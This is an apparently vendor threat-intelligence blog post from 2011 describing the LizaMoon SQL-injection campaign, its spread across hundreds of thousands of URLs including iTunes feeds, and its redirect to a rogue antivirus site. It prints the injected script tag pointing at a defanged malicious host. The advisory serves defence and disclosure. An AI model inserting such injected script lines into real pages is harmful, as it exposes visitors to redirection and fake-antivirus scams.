You are here

Home:Blogs:LizaMoon mass injection hits over 226,000 URLs (was 28,000)
X-Labs
March 29, 2011

LizaMoon mass injection hits over 226,000 URLs (was 28,000)

Patrik Runald
Cyber Attack

Websense Security Labs and the Websense Threatseeker Network have identified a new malicious mass-injection campaign that we call LizaMoon. Websense customers are protected with the Advanced Classification Engine.

 

Updated information

We have updated information about the LizaMoon injection available here:

http://community.websense.com/blogs/securitylabs/archive/2011/03/31/update-on-lizamoon-mass-injection.aspx

 

LizaMoon

The LizaMoon mass-injection is a SQL injection attack that inserts the following line into the code of the page:

 

<script src=hxxp://lizamoon.com/ur.php></script>

 

According to a Google Search, over 28,000 226,000 URLs have been compromised. This includes several iTunes URLs, as you can see below:

 

And here is the injected code at one of those iTunes URLs:

 

The way iTunes works is that it downloads RSS/XML feeds from the publisher to update the podcast and list of available episodes. We believe that these RSS/XML feeds have been compromised with the injected code. The good thing is that iTunes encodes the script tags, which means that the script doesn't execute on the user's computer. So good job, Apple. 

The URL that is injected is unavailable right now, but the server is still up and running, so that could change at any time. While it was up, the script contained simple JavaScript code that redirected the user to a well-known Rogue AV site:hxxp://defender-uqko.in. That site is also unavailable right now, so we don't have the actual binary analysis information available yet. 

The domain lizamoon.com was registered three days ago with clearly fake information: 

 

We'll keep monitoring this mass-injection attack and provide updated information as it's available.

 

UPDATE1: A Google Search now returns over 226,000 results. Do note that this is a count of unique URLs, not infected hosts. Still, it makes it one of the bigger mass-injection attacks we have ever seen. 

 

UPDATE2: We have been monitoring the attack since it came out and noticed that the number of the compromised URLs is still increasing, 380,000 URLs so far, moreover, more domains started to be involved except for lizamoon.com. 

PR

Patrik Runald

Read more articles by Patrik Runald

About Forcepoint

Forcepoint is the leading user and data protection cybersecurity company, entrusted to safeguard organizations while driving digital transformation and growth. Our solutions adapt in real-time to how people interact with data, providing secure access while enabling employees to create value.
Learn more about Forcepoint